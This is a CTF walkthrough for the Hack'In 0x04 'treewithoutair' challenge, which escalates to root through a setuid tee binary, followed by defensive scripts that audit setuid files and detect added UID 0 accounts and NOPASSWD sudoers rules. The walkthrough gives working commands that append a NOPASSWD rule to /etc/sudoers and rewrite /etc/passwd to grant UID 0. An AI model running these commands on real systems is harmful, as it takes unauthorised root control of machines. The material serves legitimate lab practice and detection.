
HN0x04 | 🩸 treewithoutair

This challenge is a part of the Hack’In 0x04 CTF.

Goal

Read the flag in /flag.txt (need to be root).

Walkthrough

We need to privesc somehow, so let’s start with the basics: sudo permissions.

lolo@32c81f5d612d:~$ sudo -l
[sudo] password for lolo:
Sorry, user lolo may not run sudo on 32c81f5d612d.

No luck here… Let’s look for SUID binaries instead:

lolo@32c81f5d612d:~$ find / -type f -perm /u=s 2>/dev/null
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/su
/usr/bin/chfn
/usr/bin/mount
/usr/bin/tee
/usr/bin/gpasswd
/usr/bin/sudo
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign

Fancy, we can see that tee is SUID and therefore runs as root (that’s what the “tree without air” is about, nice pun). This is really good because tee lets us write to any file!
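The SUID enumeration above is exactly the check a defender should be running on a schedule, with the twist that the output is compared against a known-good list so a stray setuid tee stands out. Below is an added example (my own POSIX sh, not part of the writeup) that does that: the baseline list is a constructed sample, and make_fixture builds a throwaway directory tree mimicking the challenge host so the audit can be exercised without touching the real filesystem.

```shell
#!/bin/sh
# Added example, not part of the writeup: audit the setuid binaries under a
# root directory against a known-good baseline, so a stray "tee" like the one
# above shows up on a routine check instead of in a CTF. POSIX sh only.

# Expected setuid paths, one per line. This list is a constructed sample for
# the example; on a real host, record it from a freshly provisioned system.
SUID_BASELINE="/usr/bin/mount
/usr/bin/passwd
/usr/bin/su
/usr/bin/sudo
/usr/bin/umount"

# list_suid ROOT: print every regular file below ROOT with the setuid bit set
# (-perm -4000 is portable across GNU and BSD find, unlike -perm /u=s), as a
# path relative to ROOT so an offline image or chroot can be audited too.
list_suid() {
    root="${1:-/}"
    ( cd "$root" && find . -type f -perm -4000 2>/dev/null ) \
        | sed 's|^\.||' | LC_ALL=C sort
}

# unexpected_suid ROOT: print setuid files under ROOT that are not in
# SUID_BASELINE. Empty output means the host matches the baseline.
unexpected_suid() {
    baseline=$(mktemp)
    printf '%s\n' "$SUID_BASELINE" | LC_ALL=C sort > "$baseline"
    list_suid "${1:-/}" | LC_ALL=C comm -23 - "$baseline"
    rm -f "$baseline"
}

# make_fixture: build a throwaway directory tree that mimics the challenge
# host (constructed data): the baseline binaries plus a setuid tee and one
# ordinary file. Setting u+s on a file you own needs no privileges.
make_fixture() {
    d=$(mktemp -d)
    mkdir -p "$d/usr/bin"
    for f in mount passwd su sudo umount tee; do
        : > "$d/usr/bin/$f"
        chmod u+s "$d/usr/bin/$f"
    done
    : > "$d/usr/bin/ls"
    printf '%s' "$d"
}

# Audit a real root when executed with an argument: sh audit_suid.sh /
if [ "${1:-}" != "" ]; then
    unexpected_suid "$1"
fi
```

Run it as sh audit_suid.sh / on a live host, or point it at a mounted image; anything printed is a setuid file that is not in the baseline and deserves a look. On the challenge box the only line would be /usr/bin/tee.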

Being able to write arbitrary files as root means that we can trivially privesc:

lolo@32c81f5d612d:~$ echo 'lolo ALL=(ALL) NOPASSWD: ALL' | tee -a /etc/sudoers
lolo ALL=(ALL) NOPASSWD: ALL
lolo@32c81f5d612d:~$ sudo -l
User lolo may run the following commands on 32c81f5d612d:
    (ALL) NOPASSWD: ALL

We simply added ourselves to the sudoers file, which lets us run any command as any user without a password.

Let’s finish this:

lolo@32c81f5d612d:~$ sudo su -
root@32c81f5d612d:~# cat /flag.txt
HNx04{...}

Alternate solution (without using sudo)

In case we don’t want to use sudo for that (or we find ourselves in a situation where sudo is not available), here is what we can do instead:

lolo@391bf4fd4adf:~$ sed 's|^lolo.*|lolo:x:0:0:root:/root:/bin/bash|' /etc/passwd > /tmp/passwd; cat /tmp/passwd | tee /etc/passwd
root:x:0:0:root:/root:/bin/bash
[...]
lolo:x:0:0:root:/root:/bin/bash

We can make ourselves root by simply changing our UID/GID in the /etc/passwd file.

/!\ Be careful not to pipe the sed command directly into tee, otherwise the pipeline would read and write the same file concurrently (tee truncates /etc/passwd as soon as it opens it, possibly before sed has read it), resulting in your /etc/passwd being empty…

We are not immediately root, because the UID of our current session was fixed at login and /etc/passwd is not re-read:

lolo@391bf4fd4adf:~$ id
uid=1000 gid=996(lolo) groups=996(lolo),27(sudo)

However, if we simply re-open a session, we are directly root!

lolo@391bf4fd4adf:~$ su - lolo
Password:
root@391bf4fd4adf:~# id
uid=0(root) gid=0(root) groups=0(root),27(sudo)
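Both privesc routes in this writeup leave a durable artefact behind: a NOPASSWD: ALL line in /etc/sudoers and a second UID 0 entry in /etc/passwd. Unlike the live session shown by id, those survive logouts and reboots, which makes them easy to detect after the fact. The following is an added example (my own POSIX sh plus awk, not part of the writeup) that flags both from copies of the two files; the passwd and sudoers samples it builds are constructed for the example and mirror the lolo lines above.

```shell
#!/bin/sh
# Added example, not part of the writeup: detect the two artefacts the writeup
# leaves behind, an extra UID 0 account in /etc/passwd and a NOPASSWD: ALL rule
# in sudoers, from copies of those files. Sample files are constructed below
# for the example; pass the real ones to audit a host. POSIX sh plus awk.

# uid0_accounts PASSWD: print every account with UID 0 whose name is not root.
# A second UID 0 entry is exactly what "lolo:x:0:0:..." above produces.
uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# nopasswd_rules SUDOERS: print non-comment lines containing NOPASSWD. Output
# is empty (exit 0) when there are none, so it is safe under set -e.
nopasswd_rules() {
    grep -v '^[[:space:]]*#' "$1" | grep 'NOPASSWD' || true
}

# count_findings PASSWD SUDOERS: total number of lines flagged by both checks.
count_findings() {
    { uid0_accounts "$1"; nopasswd_rules "$2"; } | awk 'END { print NR }'
}

# make_fixture: write constructed passwd and sudoers samples to a temp dir and
# print the directory. The lolo lines mirror the writeup's modifications.
make_fixture() {
    d=$(mktemp -d)
    cat > "$d/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
lolo:x:0:0:root:/root:/bin/bash
alice:x:1001:1001::/home/alice:/bin/bash
EOF
    cat > "$d/sudoers" <<'EOF'
# constructed sample sudoers
Defaults env_reset
root ALL=(ALL:ALL) ALL
%sudo ALL=(ALL:ALL) ALL
lolo ALL=(ALL) NOPASSWD: ALL
EOF
    printf '%s' "$d"
}

# Audit real files when run with two arguments (reading /etc/sudoers needs
# root): sh audit_accounts.sh /etc/passwd /etc/sudoers
if [ $# -eq 2 ]; then
    echo "UID 0 accounts other than root:"; uid0_accounts "$1"
    echo "NOPASSWD sudo rules:"; nopasswd_rules "$2"
fi
```

On a clean host both lists are empty. On the challenge box after either walkthrough, uid0_accounts prints lolo and nopasswd_rules prints the appended sudoers line; the same checks work on files pulled from a disk image, since nothing here depends on the running system.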